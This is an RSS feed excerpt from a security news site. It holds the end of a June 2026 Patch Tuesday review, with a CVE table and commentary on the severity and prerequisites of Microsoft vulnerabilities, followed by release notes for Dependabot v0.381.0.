  <td width="256" class="xl68">Windows SDK Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42906"><span>CVE-2026-42906</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42907"><span>CVE-2026-42907</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47648"><span>CVE-2026-47648</span></a></td>
  <td width="256" class="xl68">Windows Storage
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42915"><span>CVE-2026-42915</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP Denial
  of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42904"><span>CVE-2026-42904</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42968"><span>CVE-2026-42968</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42912"><span>CVE-2026-42912</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45597"><span>CVE-2026-45597</span></a></td>
  <td width="256" class="xl68">Windows UI Automation
  Manager (uiamanager.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45599"><span>CVE-2026-45599</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45635"><span>CVE-2026-45635</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40409"><span>CVE-2026-40409</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40404"><span>CVE-2026-40404</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42989"><span>CVE-2026-42989</span></a></td>
  <td width="256" class="xl68">Winlogon
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="144"></td>
  <td width="256"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  




  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Looking at the other Critical-rated bugs in this release, the scariest-looking one is actually nothing to concern yourself with at all. The CVSS 10 bug in Azure HorizonDB has already been addressed by Microsoft and is just being documented now. That’s also the case for five others. Of course, there wouldn’t be a release without Office bugs that have the Preview Pane as an attack vector. There are multiple in June. There’s a handful of bugs in the Remote Desktop Client, but these rely on connecting to a malicious RDP server. There are three patches for Hyper-V that allow for guest-to-host code execution. The bug in Active Directory requires authentication, but any authenticated user can hit it. For the Windows Directory Service vulnerability, it needs to be listening for TFTP. You have blocked that everywhere, right? The bug in Azure Network Adapter is somewhat unique as you need to update your Linux kernel to be protected. The bug in Azure Kubernetes allows an attacker to break out of a container and gain control of the AKS worker node. Finally, the bug in the Kerberos Key Distribution Center (KDC) seems unlikely, but if exploited, it could allow authenticated attackers to get code execution on affected systems.</p><p class="">Moving on to the other code execution bugs, there are the ubiquitous open-an-own bugs in Office components like Excel and Word. The code injection bug in Exchange Server looks troubling, but it requires a machine-in-the-middle (MiTM), so exploitation is unlikely. The bugs in SharePoint require authentication, but you should note that the patch applies to both SharePoint Server 2016 and SharePoint Enterprise Server 2016. The two bugs in UPnP are interesting. Both can lead to code execution by causing an error during the handling of specially crafted data, which could lead to a Use After Free (UAF) bug. The bugs in RDP Client all require connecting to a malicious RDP server, but it’s not clear why some are rated Critical and some are rated Important. The NTFS vulnerability requires a user to mount a virtual hard drive on an affected system. The last RCE bug this month is in Azure Stack Edge and requires the attacker to send a specially crafted file upload request that includes a manipulated file name or path, leading to code execution.</p><p class="">There are more than 60 Elevation of Privilege (EoP) bugs in this month’s release, and as usual, most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges, so there’s not much to add without further technical details about the bugs themselves. A notable exception is in Exchange Server, where a user on Outlook Web Access (OWA) could gain access to other mailboxes. The bug in Visual Studio Code could allow attackers to gain permissions associated with the MCP Server’s managed identity. The bugs in Windows SDK and Windows UI Automation Manager could let attacker go from low integrity up to medium integrity code execution. The bug in Bluetooth just allows “elevated” privileges without really describing what elevated might be. </p><p class="">Moving on to the more than 20 security feature bypass (SFB) bugs in the June release, there are a total of 10 that impact Secure Boot. All carry scope change (S:C) in the CVSS, meaning successful exploitation affects security boundaries beyond the vulnerable component itself — specifically the ability to load untrusted code at boot, bypass Virtual Secure Mode, and undermine boot integrity guarantees. CVE-2026-45654 explicitly calls out VSM exposure. The bulk of these are credited to Alon Leviev (STORM), which is notable given his prior BootKitty/BlackLotus-adjacent research. The bugs in the Windows Boot Manager have a similar impact as the Secure Boot bugs. The UEFI Secure Boot vulnerabilities go a layer deeper. They require either local admin or physical access but could allow for the running of untrusted code even before the OS loads. Rootkits anyone? The four bugs in BitLocker all require physical access but could yield encrypted data if exploited. The bug in Windows Administration Protection allows attackers to bypass the feature that prevents standard-user apps from performing admin-level actions. The bug in Visual Studio Copilot Chat could be the most interesting non-boot bug here as it allows authentication impersonation. Mark of the Web (MotW) and Excel vulns could bypass user warnings. Lastly, the bug in PC Manager bypasses expected user controls. </p><p class="">Turning our attention to the mass of spoofing bugs in the release, we instantly see 18 impacting SharePoint Server. Fortunately, these are simply cross-site scripting (XSS) bugs. It’s the Exchange bugs we should really watch for. One is an XSS that an attacker can exploit by convincing an Exchange administrator to open a malicious link or message, which then runs code in the admin's web session. That's a meaningful privilege escalation path. Another is listed as an SSRF-based attack, but no other details are available. The last is a lower-impact XSS with limited confidentiality/integrity loss. The bug in Bing Search (remember Bing?) is a classic search result spoofing. The bug in Azure Stack Edge is interesting as it could allow access to resources outside the vulnerable component's security boundary. The bug in Office for Android requires user interaction. The Office Project Server bug is an authenticated XSS with low impact. The final spoofing bug is in Azure Attestation but has already been addressed. You should still verify you are protected by following the instructions in the write-up from Microsoft.</p><p class="">There are 30 different information disclosure bugs in this release, and fortunately, the vast majority of these simply result in info leaks consisting of unspecified memory contents or memory addresses. The two bugs in Visual Studio require user interaction and could “disclose information over a network.” How obtuse. The bug in GitHub Copilot and Visual Studio Code could disclose discloses a sign-in access token for a user's work account. That's a meaningful credential exposure, not just random memory. That leaves the two bugs in Exchange Server. One could allow an authenticated user to gain information about which network services that the Exchange server can reach. The other sounds much like the spoofing bug in OWA as it allows attackers to see information in mailboxes they should not have access to.</p><p class="">I’ve never been a fan of the “tampering” category, as it could mean so many different things. For example, the bug in .NET simply says it could allow an unauthorized attacker to perform tampering locally. Similarly, the bug in Visual Studio says the same, expect here the tampering occurs over a network. Microsoft doesn’t even bother with a CWE for the tampering bug in the DHCP Server, so your guess is as good as mine.</p><p class="">There are seven DoS bugs in the June release, and as usual, Microsoft provides little to no actionable information about the vulnerabilities. The most interesting is the bug in HTTP.sys, which is listed as publicly known. This is an uncontrolled resource consumption, rated "Exploitation More Likely," and publicly disclosed. Since, HTTP.sys sits at the core of IIS and Windows web services, a network-accessible DoS here can take down any Windows server running HTTP-based services. Based on the Acknowledgement, it looks like this bug may have been found using AI. There are no real details for the other bugs, but based simply on the impact, I would focus on the Kerberos and TCP/IP bugs if you had to prioritize.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">The next Patch Tuesday will be on July 14 and will be the last one before Black Hat/DEFCON. It’s usually a big release, so strap in and hang on. I’ll be back then to give you my full thoughts. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p><p class=""> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.381.0]]></title>
<description><![CDATA[What's Changed

Disable npmMinimalAgeGate for Yarn Berry security updates by @yeikel in #15191
Add Bundler 4 support by @JamieMagee in #15180
Bump org.apache.maven.plugins:maven-dependency-plugin from 3.10.0 to 3.11.0 in /maven/lib/dependabot/maven by @dependabot[bot] in #15190
Add GONOPROXY/GONO...]]></description>
<link>https://tsecurity.de/de/3585494/it-security-tools/v03810/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585494/it-security-tools/v03810/</guid>
<pubDate>Tue, 09 Jun 2026 20:03:39 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Disable <code>npmMinimalAgeGate</code> for Yarn Berry security updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yeikel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yeikel">@yeikel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559053748" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15191" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15191/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15191">#15191</a></li>
<li>Add Bundler 4 support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550272581" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15180" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15180/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15180">#15180</a></li>
<li>Bump org.apache.maven.plugins:maven-dependency-plugin from 3.10.0 to 3.11.0 in /maven/lib/dependabot/maven by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558155372" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15190" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15190/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15190">#15190</a></li>
<li>Add GONOPROXY/GONOSUMDB env vars to go_modules FileParser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nishnha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nishnha">@Nishnha</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535763937" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15159" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15159/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15159">#15159</a></li>
<li>fix(go_modules): include advisory pseudo-version boundaries for security fix resolution by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4581388821" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15213" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15213/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15213">#15213</a></li>
<li>Retry Gradle metadata fetch on EOF by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4571955788" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15204" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15204/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15204">#15204</a></li>
<li>Handle npm registry EOFError in latest version finder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572308896" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15205" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15205/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15205">#15205</a></li>
<li>fix(python): honor <code>.pip-tools.toml</code> unsafe-package in pip-compile updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570542348" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15202" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15202/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15202">#15202</a></li>
<li>Swift: add missing rescue-path test for trailing slash in normalize_name by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589017627" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15220" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15220/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15220">#15220</a></li>
<li>Fix TypeError: String does not have #dig method in PipenvRunner by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325772968" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14821" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14821/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14821">#14821</a></li>
<li>fix(go_modules): run strict go mod tidy and surface real errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4490834143" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15094" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15094/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15094">#15094</a></li>
<li>Gate YARN_NPM_MINIMAL_AGE_GATE on Yarn 4.10+ by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yeikel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yeikel">@yeikel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4593578008" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15226" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15226/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15226">#15226</a></li>
<li>opentofu: handle OCI source type in MetadataFinder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/diofeher/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/diofeher">@diofeher</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4429659406" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14990" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14990/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14990">#14990</a></li>
<li>Respect cooldown rules when generating Poetry lockfiles by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597755941" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15232" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15232/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15232">#15232</a></li>
<li>Fix nuget exception on call to single() by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sebasgomez238/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sebasgomez238">@sebasgomez238</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598279920" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15233" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15233/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15233">#15233</a></li>
<li>Fix Maven property update previous version metadata by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4592956545" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15224" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15224/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15224">#15224</a></li>
<li>Detect ICU package error indicating EOL SDK by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4599099554" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15234" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15234/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15234">#15234</a></li>
<li>Fix docker_compose parser crash on YAML symbols in lock files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4457365097" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15036" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15036/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15036">#15036</a></li>
<li>Handle Berry lockfiles without explicit Yarn config by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325731751" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14820" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14820/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14820">#14820</a></li>
<li>Fix behavioral gap in prerelease detection found with Python and generalized to common by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-HaripriyaC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-HaripriyaC">@v-HaripriyaC</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550112551" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15179" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15179/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15179">#15179</a></li>
<li>Fix incorrect cooldown filtering for sha pinned dependencies in pre-commit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4593219626" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15225" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15225/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15225">#15225</a></li>
<li>Harden Helm helper CLI argument handling and fix <code>helm search</code> flag ordering by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4612431415" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15247" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15247/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15247">#15247</a></li>
<li>Add an experimental GitHub Action summary for graph jobs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589995852" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15223" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15223/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15223">#15223</a></li>
<li>Add RBI shims for API client wrappers, remove ~110 T.unsafe calls by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198285672" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14615" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14615/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14615">#14615</a></li>
<li>Bump library/rust from 1.94.0-bookworm to 1.95.0-bookworm in /cargo by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4558142583" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15188" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15188/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15188">#15188</a></li>
<li>Replace Job's untyped hashes with T::ImmutableStruct by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198693366" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14616" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14616/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14616">#14616</a></li>
<li>Fix Gradle/Maven prerelease detection gaps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/v-HaripriyaC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/v-HaripriyaC">@v-HaripriyaC</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589973660" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15222" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15222/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15222">#15222</a></li>
<li>Fix OCI Helm chart metadata finder to strip oci:// prefix by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3663004857" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/13634" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/13634/hovercard" href="https://github.com/dependabot/dependabot-core/pull/13634">#13634</a></li>
<li>Fix workflow summary experiment name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614939790" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15250" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15250/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15250">#15250</a></li>
<li>Validate dependency versions in GlobalJsonDiscovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616763664" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15255" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15255/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15255">#15255</a></li>
<li>Enable two Sorbet cops, ignore bazel/nix specs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618794235" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15257" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15257/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15257">#15257</a></li>
